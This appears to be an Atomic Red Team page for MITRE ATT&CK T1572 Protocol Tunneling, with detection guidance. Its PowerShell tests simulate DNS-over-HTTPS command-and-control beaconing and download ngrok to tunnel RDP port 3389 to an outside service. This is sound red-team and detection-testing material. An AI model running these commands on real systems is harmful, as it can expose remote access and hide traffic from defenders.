# T1572 - Protocol Tunneling
Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. 

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 

[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 

Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. 

## Atomic Tests

### Atomic Test #1 - DNS over HTTPS Large Query VolumeThis test simulates an infected host sending a large volume of DoH queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DoH queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest "https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=TXT" -UseBasicParsing).Content }
```

In [ ]:
Invoke-AtomicTest T1572 -TestNumbers 1

### Atomic Test #2 - DNS over HTTPS Regular BeaconingThis test simulates an infected host beaconing via DoH queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Set-Location "PathToAtomicsFolder"
.\T1572\src\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30
```

In [ ]:
Invoke-AtomicTest T1572 -TestNumbers 2

### Atomic Test #3 - DNS over HTTPS Long Domain QueryThis test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DoH queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DoH queries for long domain names over a set threshold.
 Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Set-Location "PathToAtomicsFolder"
.\T1572\src\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT
```

In [ ]:
Invoke-AtomicTest T1572 -TestNumbers 3

### Atomic Test #4 - run ngrok
Download and run ngrok. Create tunnel to chosen port.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Download ngrok

##### Check Prereq Commands:
```powershell
if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null
Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip
Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok

```

In [ ]:
Invoke-AtomicTest T1572 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
C:\Users\Public\ngrok\ngrok.exe config add-authtoken N/A | Out-Null
Start-Job -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp 3389 } | Out-Null
Start-Sleep -s 5 
Stop-Job -Name Job1 | Out-Null
```

In [ ]:
Invoke-AtomicTest T1572 -TestNumbers 4

#### Cleanup: 
```powershell
Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore
Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1572 -TestNumbers 4 -Cleanup

## Detection
Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. 

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)


## Shield Active Defense
### Network Monitoring 
 Monitor network traffic in order to detect adversary activity. 

 Network monitoring involves capturing network activity data, including capturing of server, firewall, and other relevant logs. A defender can then review them or send them to a centralized collection location for further analysis.
#### Opportunity
There is an opportunity to monitor network traffic for different protocols, anomalous traffic patterns, transfer of data, etc. to determine the presence of an adversary.
#### Use Case
A defender can monitor for systems establishing connections using encapsulated protocols not commonly used together such as RDP tunneled over TCP.
#### Procedures
Capture network logs for internet-facing devices and send those logs to a central collection location.
Capture all network  device (router, switches, proxy, etc.) logs on a decoy network and send those logs to a central collection location.
